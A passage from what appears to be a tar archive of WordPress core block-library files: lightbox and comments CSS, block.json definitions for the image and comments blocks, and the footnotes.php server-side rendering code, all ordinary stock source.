  height:var(--wp--lightbox-image-height);
  min-height:var(--wp--lightbox-image-height);
  min-width:var(--wp--lightbox-image-width);
  width:var(--wp--lightbox-image-width);
}
.wp-lightbox-overlay .wp-block-image figcaption{
  display:none;
}
.wp-lightbox-overlay button{
  background:none;
  border:none;
}
.wp-lightbox-overlay .scrim{
  background-color:#fff;
  height:100%;
  opacity:.9;
  position:absolute;
  width:100%;
  z-index:2000000;
}
.wp-lightbox-overlay.active{
  animation:turn-on-visibility .25s both;
  visibility:visible;
}
.wp-lightbox-overlay.active img{
  animation:turn-on-visibility .35s both;
}
.wp-lightbox-overlay.show-closing-animation:not(.active){
  animation:turn-off-visibility .35s both;
}
.wp-lightbox-overlay.show-closing-animation:not(.active) img{
  animation:turn-off-visibility .25s both;
}
@media (prefers-reduced-motion:no-preference){
  .wp-lightbox-overlay.zoom.active{
    animation:none;
    opacity:1;
    visibility:visible;
  }
  .wp-lightbox-overlay.zoom.active .lightbox-image-container{
    animation:lightbox-zoom-in .4s;
  }
  .wp-lightbox-overlay.zoom.active .lightbox-image-container img{
    animation:none;
  }
  .wp-lightbox-overlay.zoom.active .scrim{
    animation:turn-on-visibility .4s forwards;
  }
  .wp-lightbox-overlay.zoom.show-closing-animation:not(.active){
    animation:none;
  }
  .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{
    animation:lightbox-zoom-out .4s;
  }
  .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container img{
    animation:none;
  }
  .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .scrim{
    animation:turn-off-visibility .4s forwards;
  }
}

@keyframes turn-on-visibility{
  0%{
    opacity:0;
  }
  to{
    opacity:1;
  }
}
@keyframes turn-off-visibility{
  0%{
    opacity:1;
    visibility:visible;
  }
  99%{
    opacity:0;
    visibility:visible;
  }
  to{
    opacity:0;
    visibility:hidden;
  }
}
@keyframes lightbox-zoom-in{
  0%{
    transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));
  }
  to{
    transform:translate(-50%, -50%) scale(1);
  }
}
@keyframes lightbox-zoom-out{
  0%{
    transform:translate(-50%, -50%) scale(1);
    visibility:visible;
  }
  99%{
    visibility:visible;
  }
  to{
    transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));
    visibility:hidden;
  }
}image/block.json000060400000005557151330427370007630 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/image",
	"title": "Image",
	"category": "media",
	"usesContext": [ "allowResize", "imageCrop", "fixedHeight" ],
	"description": "Insert an image to make a visual statement.",
	"keywords": [ "img", "photo", "picture" ],
	"textdomain": "default",
	"attributes": {
		"url": {
			"type": "string",
			"source": "attribute",
			"selector": "img",
			"attribute": "src",
			"__experimentalRole": "content"
		},
		"alt": {
			"type": "string",
			"source": "attribute",
			"selector": "img",
			"attribute": "alt",
			"default": "",
			"__experimentalRole": "content"
		},
		"caption": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "figcaption",
			"__experimentalRole": "content"
		},
		"lightbox": {
			"type": "object",
			"enabled": {
				"type": "boolean"
			}
		},
		"title": {
			"type": "string",
			"source": "attribute",
			"selector": "img",
			"attribute": "title",
			"__experimentalRole": "content"
		},
		"href": {
			"type": "string",
			"source": "attribute",
			"selector": "figure > a",
			"attribute": "href",
			"__experimentalRole": "content"
		},
		"rel": {
			"type": "string",
			"source": "attribute",
			"selector": "figure > a",
			"attribute": "rel"
		},
		"linkClass": {
			"type": "string",
			"source": "attribute",
			"selector": "figure > a",
			"attribute": "class"
		},
		"id": {
			"type": "number",
			"__experimentalRole": "content"
		},
		"width": {
			"type": "string"
		},
		"height": {
			"type": "string"
		},
		"aspectRatio": {
			"type": "string"
		},
		"scale": {
			"type": "string"
		},
		"sizeSlug": {
			"type": "string"
		},
		"linkDestination": {
			"type": "string"
		},
		"linkTarget": {
			"type": "string",
			"source": "attribute",
			"selector": "figure > a",
			"attribute": "target"
		}
	},
	"supports": {
		"interactivity": true,
		"align": [ "left", "center", "right", "wide", "full" ],
		"anchor": true,
		"color": {
			"text": false,
			"background": false
		},
		"filter": {
			"duotone": true
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"width": true,
			"__experimentalSkipSerialization": true,
			"__experimentalDefaultControls": {
				"color": true,
				"radius": true,
				"width": true
			}
		},
		"shadow": {
			"__experimentalSkipSerialization": true
		}
	},
	"selectors": {
		"border": ".wp-block-image img, .wp-block-image .wp-block-image__crop-area, .wp-block-image .components-placeholder",
		"shadow": ".wp-block-image img, .wp-block-image .wp-block-image__crop-area, .wp-block-image .components-placeholder",
		"filter": {
			"duotone": ".wp-block-image img, .wp-block-image .components-placeholder"
		}
	},
	"styles": [
		{
			"name": "default",
			"label": "Default",
			"isDefault": true
		},
		{ "name": "rounded", "label": "Rounded" }
	],
	"editorStyle": "wp-block-image-editor",
	"style": "wp-block-image"
}
image/theme.css000060400000000324151330427370007442 0ustar00:root :where(.wp-block-image figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme :root :where(.wp-block-image figcaption){
  color:#ffffffa6;
}

.wp-block-image{
  margin:0 0 1em;
}image/editor-rtl.css000060400000006127151330427370010434 0ustar00.wp-block-image.wp-block-image.is-selected .components-placeholder{
  background-color:#fff;
  border:none;
  border-radius:2px;
  box-shadow:inset 0 0 0 1px #1e1e1e;
  color:#1e1e1e;
  filter:none !important;
}
.wp-block-image.wp-block-image.is-selected .components-placeholder>svg{
  opacity:0;
}
.wp-block-image.wp-block-image.is-selected .components-placeholder .components-placeholder__illustration{
  display:none;
}
.wp-block-image.wp-block-image .block-bindings-media-placeholder-message,.wp-block-image.wp-block-image.is-selected .components-placeholder:before{
  opacity:0;
}
.wp-block-image.wp-block-image.is-selected .block-bindings-media-placeholder-message{
  opacity:1;
}
.wp-block-image.wp-block-image .components-button,.wp-block-image.wp-block-image .components-placeholder__instructions,.wp-block-image.wp-block-image .components-placeholder__label{
  transition:none;
}

figure.wp-block-image:not(.wp-block){
  margin:0;
}

.wp-block-image{
  position:relative;
}
.wp-block-image .is-applying img,.wp-block-image.is-transient img{
  opacity:.3;
}
.wp-block-image figcaption img{
  display:inline;
}
.wp-block-image .components-spinner{
  position:absolute;
  right:50%;
  top:50%;
  transform:translate(50%, -50%);
}

.wp-block-image .components-resizable-box__container{
  display:table;
}
.wp-block-image .components-resizable-box__container img{
  display:block;
  height:inherit;
  width:inherit;
}

.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{
  left:0;
  margin:-1px 0;
  position:absolute;
  right:0;
}
@media (min-width:600px){
  .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{
    margin:-1px;
  }
}

[data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{
  height:auto;
  width:100%;
}

.wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{
  display:table;
}
.wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{
  caption-side:bottom;
  display:table-caption;
}

.wp-block[data-align=left]>.wp-block-image{
  margin:.5em 0 .5em 1em;
}

.wp-block[data-align=right]>.wp-block-image{
  margin:.5em 1em .5em 0;
}

.wp-block[data-align=center]>.wp-block-image{
  margin-left:auto;
  margin-right:auto;
  text-align:center;
}

.wp-block-image__crop-area{
  max-width:100%;
  overflow:hidden;
  position:relative;
  width:100%;
}
.wp-block-image__crop-area .reactEasyCrop_Container{
  pointer-events:auto;
}
.wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{
  border:none;
  border-radius:0;
}

.wp-block-image__crop-icon{
  align-items:center;
  display:flex;
  justify-content:center;
  min-width:48px;
  padding:0 8px;
}
.wp-block-image__crop-icon svg{
  fill:currentColor;
}

.wp-block-image__zoom .components-popover__content{
  min-width:260px;
  overflow:visible !important;
}

.wp-block-image__toolbar_content_textarea{
  width:250px;
}image/editor-rtl.min.css000060400000005512151330427370011213 0ustar00.wp-block-image.wp-block-image.is-selected .components-placeholder{background-color:#fff;border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e;filter:none!important}.wp-block-image.wp-block-image.is-selected .components-placeholder>svg{opacity:0}.wp-block-image.wp-block-image.is-selected .components-placeholder .components-placeholder__illustration{display:none}.wp-block-image.wp-block-image .block-bindings-media-placeholder-message,.wp-block-image.wp-block-image.is-selected .components-placeholder:before{opacity:0}.wp-block-image.wp-block-image.is-selected .block-bindings-media-placeholder-message{opacity:1}.wp-block-image.wp-block-image .components-button,.wp-block-image.wp-block-image .components-placeholder__instructions,.wp-block-image.wp-block-image .components-placeholder__label{transition:none}figure.wp-block-image:not(.wp-block){margin:0}.wp-block-image{position:relative}.wp-block-image .is-applying img,.wp-block-image.is-transient img{opacity:.3}.wp-block-image figcaption img{display:inline}.wp-block-image .components-spinner{position:absolute;right:50%;top:50%;transform:translate(50%,-50%)}.wp-block-image .components-resizable-box__container{display:table}.wp-block-image .components-resizable-box__container img{display:block;height:inherit;width:inherit}.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{left:0;margin:-1px 0;position:absolute;right:0}@media (min-width:600px){.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{margin:-1px}}[data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{height:auto;width:100%}.wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{display:table}.wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{caption-side:bottom;display:table-caption}.wp-block[data-align=left]>.wp-block-image{margin:.5em 0 .5em 1em}.wp-block[data-align=right]>.wp-block-image{margin:.5em 1em .5em 0}.wp-block[data-align=center]>.wp-block-image{margin-left:auto;margin-right:auto;text-align:center}.wp-block-image__crop-area{max-width:100%;overflow:hidden;position:relative;width:100%}.wp-block-image__crop-area .reactEasyCrop_Container{pointer-events:auto}.wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{border:none;border-radius:0}.wp-block-image__crop-icon{align-items:center;display:flex;justify-content:center;min-width:48px;padding:0 8px}.wp-block-image__crop-icon svg{fill:currentColor}.wp-block-image__zoom .components-popover__content{min-width:260px;overflow:visible!important}.wp-block-image__toolbar_content_textarea{width:250px}image/style-rtl.css000060400000016023151330427370010302 0ustar00.wp-block-image img{
  box-sizing:border-box;
  height:auto;
  max-width:100%;
  vertical-align:bottom;
}
.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{
  border-radius:inherit;
}
.wp-block-image.has-custom-border img{
  box-sizing:border-box;
}
.wp-block-image.aligncenter{
  text-align:center;
}
.wp-block-image.alignfull img,.wp-block-image.alignwide img{
  height:auto;
  width:100%;
}
.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{
  display:table;
}
.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{
  caption-side:bottom;
  display:table-caption;
}
.wp-block-image .alignleft{
  float:left;
  margin:.5em 1em .5em 0;
}
.wp-block-image .alignright{
  float:right;
  margin:.5em 0 .5em 1em;
}
.wp-block-image .aligncenter{
  margin-left:auto;
  margin-right:auto;
}
.wp-block-image :where(figcaption){
  margin-bottom:1em;
  margin-top:.5em;
}
.wp-block-image.is-style-circle-mask img{
  border-radius:9999px;
}
@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){
  .wp-block-image.is-style-circle-mask img{
    border-radius:0;
    -webkit-mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');
            mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');
    mask-mode:alpha;
    -webkit-mask-position:center;
            mask-position:center;
    -webkit-mask-repeat:no-repeat;
            mask-repeat:no-repeat;
    -webkit-mask-size:contain;
            mask-size:contain;
  }
}

:root :where(.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img){
  border-radius:9999px;
}

.wp-block-image figure{
  margin:0;
}

.wp-lightbox-container{
  display:flex;
  flex-direction:column;
  position:relative;
}
.wp-lightbox-container img{
  cursor:zoom-in;
}
.wp-lightbox-container img:hover+button{
  opacity:1;
}
.wp-lightbox-container button{
  align-items:center;
  -webkit-backdrop-filter:blur(16px) saturate(180%);
          backdrop-filter:blur(16px) saturate(180%);
  background-color:#5a5a5a40;
  border:none;
  border-radius:4px;
  cursor:zoom-in;
  display:flex;
  height:20px;
  justify-content:center;
  left:16px;
  opacity:0;
  padding:0;
  position:absolute;
  text-align:center;
  top:16px;
  transition:opacity .2s ease;
  width:20px;
  z-index:100;
}
.wp-lightbox-container button:focus-visible{
  outline:3px auto #5a5a5a40;
  outline:3px auto -webkit-focus-ring-color;
  outline-offset:3px;
}
.wp-lightbox-container button:hover{
  cursor:pointer;
  opacity:1;
}
.wp-lightbox-container button:focus{
  opacity:1;
}
.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){
  background-color:#5a5a5a40;
  border:none;
}

.wp-lightbox-overlay{
  box-sizing:border-box;
  cursor:zoom-out;
  height:100vh;
  overflow:hidden;
  position:fixed;
  right:0;
  top:0;
  visibility:hidden;
  width:100%;
  z-index:100000;
}
.wp-lightbox-overlay .close-button{
  align-items:center;
  cursor:pointer;
  display:flex;
  justify-content:center;
  left:calc(env(safe-area-inset-left) + 16px);
  min-height:40px;
  min-width:40px;
  padding:0;
  position:absolute;
  top:calc(env(safe-area-inset-top) + 16px);
  z-index:5000000;
}
.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){
  background:none;
  border:none;
}
.wp-lightbox-overlay .lightbox-image-container{
  height:var(--wp--lightbox-container-height);
  overflow:hidden;
  position:absolute;
  right:50%;
  top:50%;
  transform:translate(50%, -50%);
  transform-origin:top right;
  width:var(--wp--lightbox-container-width);
  z-index:9999999999;
}
.wp-lightbox-overlay .wp-block-image{
  align-items:center;
  box-sizing:border-box;
  display:flex;
  height:100%;
  justify-content:center;
  margin:0;
  position:relative;
  transform-origin:100% 0;
  width:100%;
  z-index:3000000;
}
.wp-lightbox-overlay .wp-block-image img{
  height:var(--wp--lightbox-image-height);
  min-height:var(--wp--lightbox-image-height);
  min-width:var(--wp--lightbox-image-width);
  width:var(--wp--lightbox-image-width);
}
.wp-lightbox-overlay .wp-block-image figcaption{
  display:none;
}
.wp-lightbox-overlay button{
  background:none;
  border:none;
}
.wp-lightbox-overlay .scrim{
  background-color:#fff;
  height:100%;
  opacity:.9;
  position:absolute;
  width:100%;
  z-index:2000000;
}
.wp-lightbox-overlay.active{
  animation:turn-on-visibility .25s both;
  visibility:visible;
}
.wp-lightbox-overlay.active img{
  animation:turn-on-visibility .35s both;
}
.wp-lightbox-overlay.show-closing-animation:not(.active){
  animation:turn-off-visibility .35s both;
}
.wp-lightbox-overlay.show-closing-animation:not(.active) img{
  animation:turn-off-visibility .25s both;
}
@media (prefers-reduced-motion:no-preference){
  .wp-lightbox-overlay.zoom.active{
    animation:none;
    opacity:1;
    visibility:visible;
  }
  .wp-lightbox-overlay.zoom.active .lightbox-image-container{
    animation:lightbox-zoom-in .4s;
  }
  .wp-lightbox-overlay.zoom.active .lightbox-image-container img{
    animation:none;
  }
  .wp-lightbox-overlay.zoom.active .scrim{
    animation:turn-on-visibility .4s forwards;
  }
  .wp-lightbox-overlay.zoom.show-closing-animation:not(.active){
    animation:none;
  }
  .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{
    animation:lightbox-zoom-out .4s;
  }
  .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container img{
    animation:none;
  }
  .wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .scrim{
    animation:turn-off-visibility .4s forwards;
  }
}

@keyframes turn-on-visibility{
  0%{
    opacity:0;
  }
  to{
    opacity:1;
  }
}
@keyframes turn-off-visibility{
  0%{
    opacity:1;
    visibility:visible;
  }
  99%{
    opacity:0;
    visibility:visible;
  }
  to{
    opacity:0;
    visibility:hidden;
  }
}
@keyframes lightbox-zoom-in{
  0%{
    transform:translate(calc(((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position))*-1), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));
  }
  to{
    transform:translate(50%, -50%) scale(1);
  }
}
@keyframes lightbox-zoom-out{
  0%{
    transform:translate(50%, -50%) scale(1);
    visibility:visible;
  }
  99%{
    visibility:visible;
  }
  to{
    transform:translate(calc(((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position))*-1), calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));
    visibility:hidden;
  }
}footnotes.php000060400000007273151330427370007307 0ustar00<?php
/**
 * Server-side rendering of the `core/footnotes` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/footnotes` block on the server.
 *
 * @since 6.3.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the HTML representing the footnotes.
 */
function render_block_core_footnotes( $attributes, $content, $block ) {
	// Bail out early if the post ID is not set for some reason.
	if ( empty( $block->context['postId'] ) ) {
		return '';
	}

	if ( post_password_required( $block->context['postId'] ) ) {
		return;
	}

	$footnotes = get_post_meta( $block->context['postId'], 'footnotes', true );

	if ( ! $footnotes ) {
		return;
	}

	$footnotes = json_decode( $footnotes, true );

	if ( ! is_array( $footnotes ) || count( $footnotes ) === 0 ) {
		return '';
	}

	$wrapper_attributes = get_block_wrapper_attributes();
	$footnote_index     = 1;

	$block_content = '';

	foreach ( $footnotes as $footnote ) {
		// Translators: %d: Integer representing the number of return links on the page.
		$aria_label     = sprintf( __( 'Jump to footnote reference %1$d' ), $footnote_index );
		$block_content .= sprintf(
			'<li id="%1$s">%2$s <a href="#%1$s-link" aria-label="%3$s">↩︎</a></li>',
			$footnote['id'],
			$footnote['content'],
			$aria_label
		);
		++$footnote_index;
	}

	return sprintf(
		'<ol %1$s>%2$s</ol>',
		$wrapper_attributes,
		$block_content
	);
}

/**
 * Registers the `core/footnotes` block on the server.
 *
 * @since 6.3.0
 */
function register_block_core_footnotes() {
	register_block_type_from_metadata(
		__DIR__ . '/footnotes',
		array(
			'render_callback' => 'render_block_core_footnotes',
		)
	);
}
add_action( 'init', 'register_block_core_footnotes' );


/**
 * Registers the footnotes meta field required for footnotes to work.
 *
 * @since 6.5.0
 */
function register_block_core_footnotes_post_meta() {
	$post_types = get_post_types( array( 'show_in_rest' => true ) );
	foreach ( $post_types as $post_type ) {
		// Only register the meta field if the post type supports the editor, custom fields, and revisions.
		if (
			post_type_supports( $post_type, 'editor' ) &&
			post_type_supports( $post_type, 'custom-fields' ) &&
			post_type_supports( $post_type, 'revisions' )
		) {
			register_post_meta(
				$post_type,
				'footnotes',
				array(
					'show_in_rest'      => true,
					'single'            => true,
					'type'              => 'string',
					'revisions_enabled' => true,
				)
			);
		}
	}
}
/*
 * Most post types are registered at priority 10, so use priority 20 here in
 * order to catch them.
*/
add_action( 'init', 'register_block_core_footnotes_post_meta', 20 );

/**
 * Adds the footnotes field to the revisions display.
 *
 * @since 6.3.0
 *
 * @param array $fields The revision fields.
 * @return array The revision fields.
 */
function wp_add_footnotes_to_revision( $fields ) {
	$fields['footnotes'] = __( 'Footnotes' );
	return $fields;
}
add_filter( '_wp_post_revision_fields', 'wp_add_footnotes_to_revision' );

/**
 * Gets the footnotes field from the revision for the revisions screen.
 *
 * @since 6.3.0
 *
 * @param string $revision_field The field value, but $revision->$field
 *                               (footnotes) does not exist.
 * @param string $field          The field name, in this case "footnotes".
 * @param object $revision       The revision object to compare against.
 * @return string The field value.
 */
function wp_get_footnotes_from_revision( $revision_field, $field, $revision ) {
	return get_metadata( 'post', $revision->ID, $field, true );
}
add_filter( '_wp_post_revision_field_footnotes', 'wp_get_footnotes_from_revision', 10, 3 );
comments/block.json000060400000002232151330427370010356 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comments",
	"title": "Comments",
	"category": "theme",
	"description": "An advanced block that allows displaying post comments using different visual configurations.",
	"textdomain": "default",
	"attributes": {
		"tagName": {
			"type": "string",
			"default": "div"
		},
		"legacy": {
			"type": "boolean",
			"default": false
		}
	},
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"color": {
			"gradients": true,
			"heading": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		}
	},
	"editorStyle": "wp-block-comments-editor",
	"usesContext": [ "postId", "postType" ]
}
comments/style-rtl.css000060400000005000151330427370011036 0ustar00.wp-block-post-comments{
  box-sizing:border-box;
}
.wp-block-post-comments .alignleft{
  float:right;
}
.wp-block-post-comments .alignright{
  float:left;
}
.wp-block-post-comments .navigation:after{
  clear:both;
  content:"";
  display:table;
}
.wp-block-post-comments .commentlist{
  clear:both;
  list-style:none;
  margin:0;
  padding:0;
}
.wp-block-post-comments .commentlist .comment{
  min-height:2.25em;
  padding-right:3.25em;
}
.wp-block-post-comments .commentlist .comment p{
  font-size:1em;
  line-height:1.8;
  margin:1em 0;
}
.wp-block-post-comments .commentlist .children{
  list-style:none;
  margin:0;
  padding:0;
}
.wp-block-post-comments .comment-author{
  line-height:1.5;
}
.wp-block-post-comments .comment-author .avatar{
  border-radius:1.5em;
  display:block;
  float:right;
  height:2.5em;
  margin-left:.75em;
  margin-top:.5em;
  width:2.5em;
}
.wp-block-post-comments .comment-author cite{
  font-style:normal;
}
.wp-block-post-comments .comment-meta{
  font-size:.875em;
  line-height:1.5;
}
.wp-block-post-comments .comment-meta b{
  font-weight:400;
}
.wp-block-post-comments .comment-meta .comment-awaiting-moderation{
  display:block;
  margin-bottom:1em;
  margin-top:1em;
}
.wp-block-post-comments .comment-body .commentmetadata{
  font-size:.875em;
}
.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{
  display:block;
  margin-bottom:.25em;
}
.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{
  box-sizing:border-box;
  display:block;
  width:100%;
}
.wp-block-post-comments .comment-form-cookies-consent{
  display:flex;
  gap:.25em;
}
.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{
  margin-top:.35em;
}
.wp-block-post-comments .comment-reply-title{
  margin-bottom:0;
}
.wp-block-post-comments .comment-reply-title :where(small){
  font-size:var(--wp--preset--font-size--medium, smaller);
  margin-right:.5em;
}
.wp-block-post-comments .reply{
  font-size:.875em;
  margin-bottom:1.4em;
}
.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{
  border:1px solid #949494;
  font-family:inherit;
  font-size:1em;
}
.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{
  padding:calc(.667em + 2px);
}

:where(.wp-block-post-comments input[type=submit]){
  border:none;
}comments/editor-rtl.css000060400000010777151330427370011205 0ustar00.wp-block-comments__legacy-placeholder,.wp-block-post-comments{
  box-sizing:border-box;
}
.wp-block-comments__legacy-placeholder .alignleft,.wp-block-post-comments .alignleft{
  float:right;
}
.wp-block-comments__legacy-placeholder .alignright,.wp-block-post-comments .alignright{
  float:left;
}
.wp-block-comments__legacy-placeholder .navigation:after,.wp-block-post-comments .navigation:after{
  clear:both;
  content:"";
  display:table;
}
.wp-block-comments__legacy-placeholder .commentlist,.wp-block-post-comments .commentlist{
  clear:both;
  list-style:none;
  margin:0;
  padding:0;
}
.wp-block-comments__legacy-placeholder .commentlist .comment,.wp-block-post-comments .commentlist .comment{
  min-height:2.25em;
  padding-right:3.25em;
}
.wp-block-comments__legacy-placeholder .commentlist .comment p,.wp-block-post-comments .commentlist .comment p{
  font-size:1em;
  line-height:1.8;
  margin:1em 0;
}
.wp-block-comments__legacy-placeholder .commentlist .children,.wp-block-post-comments .commentlist .children{
  list-style:none;
  margin:0;
  padding:0;
}
.wp-block-comments__legacy-placeholder .comment-author,.wp-block-post-comments .comment-author{
  line-height:1.5;
}
.wp-block-comments__legacy-placeholder .comment-author .avatar,.wp-block-post-comments .comment-author .avatar{
  border-radius:1.5em;
  display:block;
  float:right;
  height:2.5em;
  margin-left:.75em;
  margin-top:.5em;
  width:2.5em;
}
.wp-block-comments__legacy-placeholder .comment-author cite,.wp-block-post-comments .comment-author cite{
  font-style:normal;
}
.wp-block-comments__legacy-placeholder .comment-meta,.wp-block-post-comments .comment-meta{
  font-size:.875em;
  line-height:1.5;
}
.wp-block-comments__legacy-placeholder .comment-meta b,.wp-block-post-comments .comment-meta b{
  font-weight:400;
}
.wp-block-comments__legacy-placeholder .comment-meta .comment-awaiting-moderation,.wp-block-post-comments .comment-meta .comment-awaiting-moderation{
  display:block;
  margin-bottom:1em;
  margin-top:1em;
}
.wp-block-comments__legacy-placeholder .comment-body .commentmetadata,.wp-block-post-comments .comment-body .commentmetadata{
  font-size:.875em;
}
.wp-block-comments__legacy-placeholder .comment-form-author label,.wp-block-comments__legacy-placeholder .comment-form-comment label,.wp-block-comments__legacy-placeholder .comment-form-email label,.wp-block-comments__legacy-placeholder .comment-form-url label,.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{
  display:block;
  margin-bottom:.25em;
}
.wp-block-comments__legacy-placeholder .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder .comment-form textarea,.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{
  box-sizing:border-box;
  display:block;
  width:100%;
}
.wp-block-comments__legacy-placeholder .comment-form-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent{
  display:flex;
  gap:.25em;
}
.wp-block-comments__legacy-placeholder .comment-form-cookies-consent #wp-comment-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{
  margin-top:.35em;
}
.wp-block-comments__legacy-placeholder .comment-reply-title,.wp-block-post-comments .comment-reply-title{
  margin-bottom:0;
}
.wp-block-comments__legacy-placeholder .comment-reply-title :where(small),.wp-block-post-comments .comment-reply-title :where(small){
  font-size:var(--wp--preset--font-size--medium, smaller);
  margin-right:.5em;
}
.wp-block-comments__legacy-placeholder .reply,.wp-block-post-comments .reply{
  font-size:.875em;
  margin-bottom:1.4em;
}
.wp-block-comments__legacy-placeholder input:not([type=submit]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{
  border:1px solid #949494;
  font-family:inherit;
  font-size:1em;
}
.wp-block-comments__legacy-placeholder input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{
  padding:calc(.667em + 2px);
}

:where(.wp-block-post-comments input[type=submit]){
  border:none;
}

.block-library-comments-toolbar__popover .components-popover__content{
  min-width:230px;
}

.wp-block-comments__legacy-placeholder *{
  pointer-events:none;
}comments/style.css000060400000004776151330427370010262 0ustar00.wp-block-post-comments{
  box-sizing:border-box;
}
.wp-block-post-comments .alignleft{
  float:left;
}
.wp-block-post-comments .alignright{
  float:right;
}
.wp-block-post-comments .navigation:after{
  clear:both;
  content:"";
  display:table;
}
.wp-block-post-comments .commentlist{
  clear:both;
  list-style:none;
  margin:0;
  padding:0;
}
.wp-block-post-comments .commentlist .comment{
  min-height:2.25em;
  padding-left:3.25em;
}
.wp-block-post-comments .commentlist .comment p{
  font-size:1em;
  line-height:1.8;
  margin:1em 0;
}
.wp-block-post-comments .commentlist .children{
  list-style:none;
  margin:0;
  padding:0;
}
.wp-block-post-comments .comment-author{
  line-height:1.5;
}
.wp-block-post-comments .comment-author .avatar{
  border-radius:1.5em;
  display:block;
  float:left;
  height:2.5em;
  margin-right:.75em;
  margin-top:.5em;
  width:2.5em;
}
.wp-block-post-comments .comment-author cite{
  font-style:normal;
}
.wp-block-post-comments .comment-meta{
  font-size:.875em;
  line-height:1.5;
}
.wp-block-post-comments .comment-meta b{
  font-weight:400;
}
